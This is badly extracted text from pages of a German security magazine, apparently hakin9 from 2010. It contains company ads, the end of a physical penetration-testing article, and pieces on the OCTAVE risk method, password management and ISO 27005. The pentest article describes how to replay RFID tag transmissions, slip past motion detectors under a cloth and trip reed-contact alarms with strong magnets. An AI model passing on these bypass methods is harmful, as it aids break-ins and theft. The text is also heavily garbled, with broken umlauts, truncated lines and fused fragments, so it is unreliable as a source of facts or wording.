Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
ne Risikoanalyse erhaumllt man einen organisationsweiten Uumlberblick uumlber vorhandene Risiken und ist somit integ-raler Bestandteil des Risikomanagements (vergl Abb 1)
OCTAVE ist eine risikobasierende strategische Si-cherheitsbewertungs und -planungstechnik
OCTAVEreg ist ein Kunstwort und setzt sich aus den Begriffen Operationally Critical Threat Asset and Vul-nerability Evaluation zusammen Sie wurde von der Carnegie Mellon University welche auch die populaumlre
OCTAVE ndashHier macht das Risiko die MusikDie uumlberwiegende Mehrheit von Unternehmen sind nach regulativen Vorgaben wie zB Basel II Solvency II SOX 8 EU Auditrichtlinie oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares Risikomanagement und Business Continuity Planning zu implementieren
IN DIESEM ARTIKEL ERFAHREN SIE
ren
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men und Standards
Helmut Kaufmann
Abbildung 2 CIAAbbildung 1 Risikomanagementzyklus
10201026
ABWEHR
heitspraxis und Technologie ins Gleichgewicht zu setz-ten Getrieben von zwei Grundaspekten ndash operationel-les Risiko und aktuell eingesetzte Sicherheitspraktiken wird die dahinter liegende Technologie in Zusammen-hang mit der Sicherheitspraxis gegen die drei Eckpfeiler der Sicherheit gepruumlft (vergl Abb 2)
OCTAVE ist ein wertegetriebener Bewertungsansatz Das Analysis Team
die Organisation wichtig sind
diejenigen Werte die als besonders kritisch beur-teilt werden Beruumlcksichtigt die Zusammenhaumlnge zwischen den kritischen Assets den Bedrohungen und den Verwundbarkeiten
menhang
(organisatorisch und auch einen Plan zur Reduzie-rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-dell fuumlr die Erhebung des gesamtorganisatorischen Schutzbeduumlrfnisses (vergl Abb 3)
Aufbau von Asset-basierenden Bedro-
ndash Das Analyse Team stellt informati-
Web-Site wwwcertorg betreibt passend fuumlr die unter-schiedlichsten Unternehmensgroumlszligen als lizenzfreie Risikoanalyse Methode entwickelt
OCTAVE ist eine selbstgesteuerte Methode Das be-deutet dass die MitarbeiterInnen einer Organisation eine wesentliche Rolle bei der Erstellung der Sicher-heitsstrategie uumlbernehmen Risiken von hoch kritisch erkannten Assets werden dazu verwendet um eine entsprechende Priorisierung der Sicherheitsbereiche durchzufuumlhren
Im Gegensatz zu typischen technologielastigen Be-wertungsmethoden die technologische Risiken und taktische Sachverhalte in den Mittelpunkt der Betrach-tung stellen ist OCTAVE auf organisatorische Risiken und deren dazu notwendigen Technologieeinsatz aus-gerichtet Sie ist eine aumluszligerst flexible Methode die fuumlr fast alle Organisationen speziell angepasst werden kann Aus der Sichtweise des Autors ist einer der be-merkenswertesten Vorteile jedoch dass die Methode von den MitarbeiterInnen selbst schnell erlernt und kon-tinuierlich durchgefuumlhrt werden kann und somit nach-haltig in den Risikomanagementprozess ohne weitere Kosten integrierbar ist
Ein ausgewaumlhltes kleines Team aus allen operatio-nellen Bereichen der Organisation inklusive der IT Ab-teilung arbeiten zusammen um die Sicherheitsbeduumlrf-nisse der Organisation zu identifizieren und versuchen die Gebiete Operationelles Risiko eingesetzte Sicher-
Abbildung 3 Octave Phasen
OCTAVE
hakin9orgde 27
onsbezogene Assets und deren Impact auf die Or-ganisation sowie deren derzeitige Schutzmechanis-men fest Darauf aufbauend werden die kritischsten
dafuumlr bestimmt Anschlieszligend wird fuumlr jedes kri-
Erkennen von Verwundbarkeiten der Infra-
struktur ndash Hier wird die hinter den kritischen Assets liegende Infrastruktur bewertet Dabei werden kriti-sche Infrastrukturpfade und informationstechnolo-gische Komponentenklassen aufgestellt und einer technischen Uumlberpruumlfung ndash dem Penetration Test ndash
tung direkt ein
ndash In dieser Phase ent-scheidet das Analyse-Team wie mit den kritischen Assets umgegangen werden soll Basierend auf die
organisationsweite Schutzstrategie und ein Plan fuumlr die Reduzierung der erkannten Risiken die auf die kritischen Assets und deren Infrastrukturen einwir-ken koumlnnen erstellt
Die einzelnen Prozesse die den drei Phasen hinter-legt sind stellen sicher dass von allen Organisati-
onseinheiten und von allen hierarchischen Ebenen ndash also von den MitarbeiterInnen uumlber operationa-les und strategisches Management bis hin zum Ma-nagement der ersten Ebene alle Sichtweisen und die damit verbundenen Bewertungen der kritisch-
koumlnnen OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken
zen
wie die erstellte Schutzstrategie und der Plan zur Risikoreduzierung umgesetzt werden kann
Handlungs-Planes
UumlberwachenBeobachten des Handlungsplanes nach Effektivitaumlt Das beinhaltet zB das Beobachten der Risiken fuumlr jede Aumlnderung
ken
Die OCTAVE Methode ersetzt kein Risikomanagement sondern gehoumlrt in ein strukturiertes Risikomanage-
Abbildung 4 Octave und Risikomanagement
10201028
ABWEHR
ment eingebettet welches nach einem act Zyklus arbeitet (vergl Abb 4)
Die Organisation sollte in periodischen Abstaumlnden ihre ermittelte Baseline zuruumlcksetzen indem eine nochmalige Risikoanalyse durchgefuumlhrt wird Diese Zeitspanne kann vorgegeben werden oder von wich-tigen Ereignissen wie zB eine Restrukturierungs-maszlignahme der zB Netzwerkinfrastruktur uvm an-gestoszligen werden Zwischen den Analysen kann die Organisation periodisch neue Risiken identifizieren analysieren und in Relation zu bereits existieren-den Risiken Risiko reduzierende Maszlignahmen entwi-ckeln
Da die Risikoanalyse nur einen Teil des Risikoma-nagements darstellt ist die OCTAVE Methode mit ih-rer offenen Schnittstelle hervorragend geeignet um als bdquoBest Practiceldquo-Grundlage die ISO 27001 Norm zu im-
plementieren und in der Umsetzungsphase den COBIT 40 Standard zu verwenden
OCTAVE bildet die Grundlage der in der ISO 27001
trachtungsbereiches feststellen von kritischen Orga-nisationswerten qualitative und eventuell quantitative Betrachtung von Risiken Entwicklung von entspre-chenden Kontrollmaszlignahmen um Risiken zu minimie-ren oder aber auch zu akzeptieren Anschlieszligend kann man unter Zuhilfenahme von COBIT die der ISO Norm zugeschriebenen Kontrollen implementieren Man kann somit die IT Sicherheitsstrategie der betrachteten Organisation mit einer Risikoanalyse nach dem OCTA-VE Ansatz und dem standardisierten Reifegrad-Modell nach COBIT - gepruumlft nach ISO 27001 - auswerten und umsetzen (Verg Abb 5)
Abbildung 5 Mapping auf ISO 27001
Mehr Informationenwwwcertorgoctave
wwwisacaorgwwwstandards-onlinenetInformationSecurity-
Standardhtm
MAG HELMUT KAUFMANN MSCDozent an der Fachhochschule St Poumllten und ua taumltig im Be-reich Secure Data Center Management Cloud Computing Di-saster Recovery and Business Continuity Fraud Detection
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
